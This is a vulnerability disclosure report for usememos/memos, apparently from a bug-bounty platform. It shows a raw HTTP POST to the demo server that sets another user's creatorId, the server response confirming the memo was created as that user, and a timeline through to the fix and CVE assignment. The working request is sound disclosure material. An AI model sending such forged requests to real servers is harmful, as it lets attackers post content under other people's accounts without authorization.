An attacker can be post message in other memos page in usememos/memos

Valid

Reported on

Dec 26th 2022


Description

An attacker can be post malicious content to other user's memos page via POST request, attacker just add an creatorID into body request and send it with Burpsuite

Here is video poc: https://drive.google.com/file/d/1dNKo-ybfguam4YdvmluYujN2nkTG5D9G/view?usp=share_link

Proof of Concept

POST /api/memo HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjA0OTc2MnxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfLUE9fO9PeYJaiVNyk3XeLr92UBxuKGY5S-4YXFqSUSCvaAvB
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 116
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{
"creatorId":104,
"content":"post this message in demouser wall ","visibility":"PRIVATE",
"resourceIdList":[]
}

Server Response:

HTTP/2 200 OK
Date: Mon, 26 Dec 2022 10:29:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 423
Cf-Ray: 77f9233de8d5231a-HKG
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":1054,"rowStatus":"NORMAL","creatorId":104,"createdTs":1672050590,"updatedTs":1672050590,"content":"post this message in demouser wall ","visibility":"PRIVATE","pinned":false,"displayTs":1672050590,"creator":{"id":104,"rowStatus":"NORMAL","createdTs":1672035458,"updatedTs":1672035527,"username":"demouser","role":"USER","email":"","nickname":"demouser","openId":"","userSettingList":null},"resourceList":[]}}

Impact

This vulnerabily affect all user in memos.

We are processing your report and will contact the usememos/memos team within 24 hours. 14 days ago
Nguyen Minh Quang modified the report
14 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back 13 days ago
STEVEN validated this vulnerability 12 days ago
Nguyen Minh Quang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Nguyen
12 days ago

Researcher


Can u assign this as a CVE ?

STEVEN marked this as fixed in 0.9.1 with commit 3556ae 11 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 11 days ago
resource.go#L23 has been validated
to join this conversation